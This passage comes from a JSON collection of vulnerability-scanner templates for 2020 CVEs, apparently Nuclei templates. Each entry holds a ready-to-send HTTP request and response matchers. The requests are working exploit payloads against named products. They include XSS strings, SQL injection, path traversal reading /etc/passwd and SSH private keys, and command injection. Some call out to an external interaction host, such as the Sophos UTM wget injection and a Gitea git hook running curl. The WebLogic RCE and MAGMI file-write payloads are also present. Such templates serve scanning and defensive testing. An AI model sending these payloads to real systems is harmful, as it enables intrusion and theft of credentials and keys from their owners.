Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-7107","info":{"name":"WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'</script><svg/onload=alert(document.cookie)>","var Display_FAQ_ID ="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8512","info":{"name":"IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-25223","info":{"name":"Sophos UTM Preauth - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /var HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, text/html, application/xml, text/xml, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nX-Prototype-Version: 1.5.1.1\nContent-Type: application/json; charset=UTF-8\nOrigin: {{BaseURL}}\nConnection: close\nReferer: {{BaseURL}}\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\n{\"objs\": [{\"FID\": \"init\"}], \"SID\": \"|wget http://{{interactsh-url}}|\", \"browser\": \"gecko_linux\", \"backend_version\": -1, \"loc\": \"\", \"_cookie\": null, \"wdebug\": 0, \"RID\": \"1629210675639_0.5000855117488202\", \"current_uuid\": \"\", \"ipv6\": true}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-12116","info":{"name":"Zoho ManageEngine OpManger - Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n","GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nCache-Control: max-age=0\nConnection: close\nReferer: http://{{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"BEGIN RSA PRIVATE KEY\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?m)/cachestart/.*/jquery/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-35749","info":{"name":"WordPress Simple Job Board <2.9.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14883","info":{"name":"Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\ntest_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["ADMINCONSOLESESSION"]},{"type":"word","part":"body","words":["{{revstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 